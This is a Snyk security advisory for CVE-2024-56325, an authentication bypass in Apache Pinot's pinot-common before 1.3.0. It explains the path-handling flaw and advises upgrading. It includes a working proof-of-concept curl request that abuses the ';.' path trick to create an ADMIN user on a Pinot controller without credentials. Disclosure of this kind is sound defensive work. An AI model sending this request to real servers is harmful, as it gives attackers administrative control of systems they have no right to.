Authentication Bypass Using an Alternate Path or Channel Affecting org.apache.pinot:pinot-common package, versions [,1.3.0)


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
2.72% (85th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-ORGAPACHEPINOT-9637839
  • published3 Apr 2025
  • disclosed1 Apr 2025
  • creditSunflower

Introduced: 1 Apr 2025

NewCVE-2024-56325  (opens in a new tab)
CWE-288  (opens in a new tab)

How to fix?

Upgrade org.apache.pinot:pinot-common to version 1.3.0 or higher.

Overview

Affected versions of this package are vulnerable to Authentication Bypass Using an Alternate Path or Channel due to improper handling of specific path conditions in the authentication process, where the path does not contain / and contains .. An attacker can gain unauthorized access and perform actions with administrative privileges by crafting a malicious request that bypasses normal authentication checks.

PoC

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

CVSS Base Scores

version 4.0
version 3.1